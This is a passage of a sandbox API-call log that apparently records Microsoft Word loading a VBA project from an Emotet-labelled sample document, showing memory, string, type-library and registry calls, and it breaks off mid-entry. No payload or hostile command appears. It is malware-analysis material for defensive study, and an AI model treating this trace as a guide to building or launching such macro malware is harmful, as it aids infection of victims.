[0067.690] rand () returned 4506 [0067.691] rand () returned 3755 [0067.694] rand () returned 1480 [0067.695] rand () returned 2806 [0067.695] rand () returned 23438 [0067.695] rand () returned 10827 [0067.695] rand () returned 6581 [0067.695] rand () returned 8456 [0067.695] rand () returned 4363 [0067.695] rand () returned 23299 [0067.695] rand () returned 27463 [0067.695] rand () returned 31590 [0067.695] rand () returned 9717 [0067.695] rand () returned 31858 [0067.695] rand () returned 430 [0067.695] rand () returned 30283 [0067.695] rand () returned 28720 [0067.695] rand () returned 3390 [0067.695] rand () returned 8207 [0067.695] rand () returned 19232 [0067.695] rand () returned 31508 [0067.695] rand () returned 1204 [0067.695] rand () returned 21647 [0067.695] rand () returned 13119 [0067.695] rand () returned 12059 [0067.695] rand () returned 11182 [0067.695] rand () returned 32173 [0067.695] rand () returned 10236 [0067.695] rand () returned 8669 [0067.695] rand () returned 31930 [0067.695] rand () returned 14804 [0067.695] rand () returned 25574 [0067.695] rand () returned 8767 [0067.695] rand () returned 20344 [0067.695] rand () returned 30000 [0067.695] rand () returned 2378 [0067.695] rand () returned 21735 [0067.695] rand () returned 21316 [0067.695] rand () returned 2498 [0067.695] rand () returned 4601 [0067.695] rand () returned 29939 [0067.695] rand () returned 7445 [0067.695] rand () returned 9647 [0067.696] rand () returned 27723 [0067.696] rand () returned 3306 [0067.696] rand () returned 19621 [0067.696] rand () returned 27614 [0067.696] rand () returned 26980 [0067.696] rand () returned 15346 [0067.696] rand () returned 3283 [0067.696] rand () returned 705 [0067.696] rand () returned 24758 [0067.696] rand () returned 23364 [0067.696] rand () returned 29509 [0067.696] rand () returned 1395 [0067.696] rand () returned 11463 [0067.696] rand () returned 6110 [0067.696] rand () returned 849 [0067.696] rand () returned 2820 [0067.696] rand () returned 25909 [0067.696] rand () returned 21623 [0067.696] rand () returned 22558 [0067.696] rand () returned 14353 [0067.696] rand () returned 31223 [0067.696] rand () returned 26552 [0067.696] rand () returned 14854 [0067.696] rand () returned 3735 [0067.696] rand () returned 5093 [0067.696] rand () returned 2729 [0067.696] rand () returned 9023 [0067.696] rand () returned 28680 [0067.696] CoCreateGuid (in: pguid=0x6a16bf8 | out: pguid=0x6a16bf8*(Data1=0x7df19d0f, Data2=0x8490, Data3=0x41fa, Data4=([0]=0x98, [1]=0x8f, [2]=0x6b, [3]=0x70, [4]=0x12, [5]=0xbe, [6]=0x68, [7]=0xed))) returned 0x0 [0067.696] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x0) returned 0x6a58f30 [0067.696] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69f94e0 [0067.696] strcpy_s (in: _Dst=0x6a16c58, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0067.697] CExposedDocFile::OpenStream () returned 0x0 [0067.697] CExposedStream::Read () returned 0x0 [0067.697] IMalloc:Alloc (This=0x7fefec05380, cb=0x2028) returned 0x4142f60 [0067.697] IMalloc:Alloc (This=0x7fefec05380, cb=0x10020*=0x10128) returned 0xaf1b5b0 [0067.697] CExposedStream::AddRef () returned 0x2 [0067.697] CExposedStream::Release () returned 0x1 [0067.698] CExposedStream::Read () returned 0x0 [0067.698] CExposedStream::Read () returned 0x0 [0067.698] CompareStringA (Locale=0x409, dwCmpFlags=0x3, lpString1="Test", cchCount1=-1, lpString2="Test", cchCount2=-1) returned 2 [0067.698] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1466b4, cbMultiByte=2, lpWideCharStr=0x1466c8, cchWideChar=2 | out: lpWideCharStr="") returned 2 [0067.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x146640, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0067.698] lstrcmpiA (lpString1="", lpString2="Project") returned -1 [0067.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0067.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x146540, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0067.699] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0067.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x146450, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0067.699] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0067.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x146450, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0067.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x146310, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0067.699] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0067.699] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0067.699] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x6877120 [0067.699] IMalloc:Free (This=0x7fefec05380, pv=0x6884b50) [0067.699] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x6884b50 [0067.699] IMalloc:Realloc (This=0x7fefec05380, pv=0x6884b50, cb=0x44) returned 0x68e1930 [0067.699] IMalloc:Free (This=0x7fefec05380, pv=0x6877120) [0067.699] strcpy_s (in: _Dst=0x6a16c68, _DstSize=0x8, _Src="Project" | out: _Dst="Project") returned 0x0 [0067.702] CLSIDFromString (in: lpsz="{00020430-0000-0000-C000-000000000046}", pclsid=0x146650 | out: pclsid=0x146650*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0067.703] wcsncpy_s (in: _Destination=0x6a6a328, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x30 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#") returned 0x0 [0067.703] wcscpy_s (in: _Destination=0x6a6a388, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0067.703] wcscpy_s (in: _Destination=0x6a6a3c6, _SizeInWords=0x10, _Source="#OLE Automation" | out: _Destination="#OLE Automation") returned 0x0 [0067.703] IMalloc:Realloc (This=0x7fefec05380, pv=0x690c880, cb=0x680) returned 0xaf2b5e0 [0067.703] wcscpy_s (in: _Destination=0xaf2b8a0, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0067.703] wcsncpy_s (in: _Destination=0x1462a0, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0067.704] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0067.704] IMalloc:Alloc (This=0x7fefec05380, cb=0xbe) returned 0x68224c0 [0067.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x68224c0, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0067.704] IMalloc:Free (This=0x7fefec05380, pv=0x68224c0) [0067.704] wcscpy_s (in: _Destination=0xaf1acc8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0067.704] wcsncpy_s (in: _Destination=0x1462e0, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0067.704] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0067.704] IMalloc:Alloc (This=0x7fefec05380, cb=0xbe) returned 0x68224c0 [0067.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x68224c0, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0067.704] IMalloc:Free (This=0x7fefec05380, pv=0x68224c0) [0067.704] wcsncpy_s (in: _Destination=0x1462a0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.704] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.704] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0x6603960 [0067.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0x6603960, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.704] IMalloc:Free (This=0x7fefec05380, pv=0x6603960) [0067.704] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0067.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x146580, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0067.704] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0067.704] strcpy_s (in: _Dst=0x146360, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0067.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x146360, cbMultiByte=7, lpWideCharStr=0x1461b0, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0067.704] IUnknown:AddRef (This=0x665ba50) returned 0x3 [0067.704] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="stdole", lHashVal=0x106093, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.704] IUnknown:Release (This=0x665ba50) returned 0x2 [0067.704] IUnknown:AddRef (This=0x631b4c0) returned 0x3 [0067.704] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="stdole", lHashVal=0x106093, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.705] IUnknown:Release (This=0x631b4c0) returned 0x2 [0067.705] IMalloc:Alloc (This=0x7fefec05380, cb=0x208) returned 0x64fcbb0 [0067.705] wcscpy_s (in: _Destination=0x6a6a328, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0067.705] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x145960 | out: phkResult=0x145960*=0xa1e) returned 0x0 [0067.705] RegOpenKeyW (in: hKey=0xa1e, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x145958 | out: phkResult=0x145958*=0xac2) returned 0x0 [0067.705] RegEnumKeyW (in: hKey=0xac2, dwIndex=0x0, lpName=0x145988, cchName=0xa | out: lpName="1.0") returned 0x0 [0067.706] RegEnumKeyW (in: hKey=0xac2, dwIndex=0x1, lpName=0x145988, cchName=0xa | out: lpName="2.0") returned 0x0 [0067.706] wcscpy_s (in: _Destination=0x145970, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0067.706] RegOpenKeyW (in: hKey=0xac2, lpSubKey="2.0", phkResult=0x145a18 | out: phkResult=0x145a18*=0xabe) returned 0x0 [0067.706] _ultoa_s (in: _Val=0x0, _DstBuf=0x145990, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0067.706] RegOpenKeyA (in: hKey=0xabe, lpSubKey="0", phkResult=0x145980 | out: phkResult=0x145980*=0xa32) returned 0x0 [0067.707] RegOpenKeyW (in: hKey=0xa32, lpSubKey="win64", phkResult=0x145988 | out: phkResult=0x145988*=0xb5a) returned 0x0 [0067.707] RegCloseKey (hKey=0xb5a) returned 0x0 [0067.708] RegCloseKey (hKey=0xa32) returned 0x0 [0067.708] _ultow_s (in: _Value=0x0, _Buffer=0x145a20, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0067.708] RegOpenKeyW (in: hKey=0xabe, lpSubKey="0", phkResult=0x1459f8 | out: phkResult=0x1459f8*=0xa32) returned 0x0 [0067.708] RegQueryValueW (in: hKey=0xa32, lpSubKey="win64", lpData=0x145a40, lpcbData=0x1459f4 | out: lpData="C:\\Windows\\system32\\stdole2.tlb", lpcbData=0x1459f4) returned 0x0 [0067.709] wcscpy_s (in: _Destination=0x64fcbb0, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0067.709] RegCloseKey (hKey=0xa32) returned 0x0 [0067.709] RegCloseKey (hKey=0xabe) returned 0x0 [0067.709] RegCloseKey (hKey=0xac2) returned 0x0 [0067.709] RegCloseKey (hKey=0xa1e) returned 0x0 [0067.709] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x146068*=0x0 | out: pptlib=0x146068*=0x665bd20) returned 0x0 [0067.710] IMalloc:Free (This=0x7fefec05380, pv=0x64fcbb0) [0067.710] IUnknown:AddRef (This=0x665bd20) returned 0x4 [0067.710] IUnknown:QueryInterface (in: This=0x665bd20, riid=0x7fee3b285a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1460c8 | out: ppvObject=0x1460c8*=0x0) returned 0x80004002 [0067.710] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="stdole", lHashVal=0x106093, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.710] IUnknown:Release (This=0x665bd20) returned 0x3 [0067.710] IMalloc:Alloc (This=0x7fefec05380, cb=0x24) returned 0x6885810 [0067.710] IMalloc:Free (This=0x7fefec05380, pv=0x68e1930) [0067.710] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x68858a0 [0067.710] IMalloc:Realloc (This=0x7fefec05380, pv=0x68858a0, cb=0x50) returned 0x6808480 [0067.710] IMalloc:Free (This=0x7fefec05380, pv=0x6885810) [0067.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x1464f0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0067.713] _stat64i32 (in: _FileName="Normal", _Stat=0x146698 | out: _Stat=0x146698) returned -1 [0067.714] wcscpy_s (in: _Destination=0x68858ae, _SizeInWords=0x7, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0067.714] wcscpy_s (in: _Destination=0xaf2b988, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0067.714] wcsncpy_s (in: _Destination=0x1462a0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0067.714] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0067.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x1461d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0067.714] wcscpy_s (in: _Destination=0xaf1adb8, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0067.714] wcsncpy_s (in: _Destination=0x1462e0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0067.714] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0067.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x146210, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0067.714] wcsncpy_s (in: _Destination=0x1462a0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x0 [0067.714] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchLength=0x7e | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0x7e [0067.714] IMalloc:Alloc (This=0x7fefec05380, cb=0xfe) returned 0x6603960 [0067.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", cchWideChar=127, lpMultiByteStr=0x6603960, cbMultiByte=254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", lpUsedDefaultChar=0x0) returned 127 [0067.714] IMalloc:Free (This=0x7fefec05380, pv=0x6603960) [0067.714] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\emotet_e2_2d2fa29185ad0f48f665f9c93cc8282d3eeca9c848543453cd223333ea2485b4_2019-03-15__142003.doc") returned 0 [0067.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x146580, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0067.715] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0067.715] strcpy_s (in: _Dst=0x146360, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0067.715] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x146360, cbMultiByte=7, lpWideCharStr=0x1461b0, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0067.715] IUnknown:AddRef (This=0x665ba50) returned 0x3 [0067.715] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.715] IUnknown:Release (This=0x665ba50) returned 0x2 [0067.715] IUnknown:AddRef (This=0x631b4c0) returned 0x3 [0067.715] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.715] IUnknown:Release (This=0x631b4c0) returned 0x2 [0067.715] IUnknown:AddRef (This=0x665bd20) returned 0x4 [0067.715] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x146280, pBstrLibName=0x1461b0 | out: pfName=0x146280*=0, pBstrLibName=0x1461b0) returned 0x0 [0067.715] IUnknown:Release (This=0x665bd20) returned 0x3 [0067.715] IMalloc:Alloc (This=0x7fefec05380, cb=0x30) returned 0x68bf9d0 [0067.715] IMalloc:Free (This=0x7fefec05380, pv=0x6808480) [0067.715] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x6885930 [0067.715] IMalloc:Realloc (This=0x7fefec05380, pv=0x6885930, cb=0x5c) returned 0x694f150 [0067.715] IMalloc:Free (This=0x7fefec05380, pv=0x68bf9d0) [0067.716] IMalloc:Alloc (This=0x7fefec05380, cb=0x94) returned 0x6a0aa40 [0067.716] IMalloc:Free (This=0x7fefec05380, pv=0x6a0aa40) [0067.716] CLSIDFromString (in: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", pclsid=0x146650 | out: pclsid=0x146650*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52))) returned 0x0 [0067.716] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0x6a64b80 [0067.716] _ultow_s (in: _Value=0x2, _Buffer=0x1464da, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0067.716] _ultow_s (in: _Value=0x8, _Buffer=0x1464de, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0067.716] _ultow_s (in: _Value=0x0, _Buffer=0x1464e2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0067.716] wcscpy_s (in: _Destination=0x68e9928, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0067.716] wcscpy_s (in: _Destination=0x68e992e, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0067.716] wcscpy_s (in: _Destination=0x68e997a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0067.716] wcscpy_s (in: _Destination=0x68e9988, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0067.716] wcscpy_s (in: _Destination=0x68e9a08, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0067.716] IMalloc:Free (This=0x7fefec05380, pv=0x6a64b80) [0067.717] wcsncpy_s (in: _Destination=0x429ce88, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x30 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#") returned 0x0 [0067.717] wcscpy_s (in: _Destination=0x429cee8, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0067.717] wcscpy_s (in: _Destination=0x429cf66, _SizeInWords=0x26, _Source="#Microsoft Office 16.0 Object Library" | out: _Destination="#Microsoft Office 16.0 Object Library") returned 0x0 [0067.717] wcscpy_s (in: _Destination=0xaf2b9c8, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0067.717] wcsncpy_s (in: _Destination=0x1462a0, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0067.717] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x94 | out: 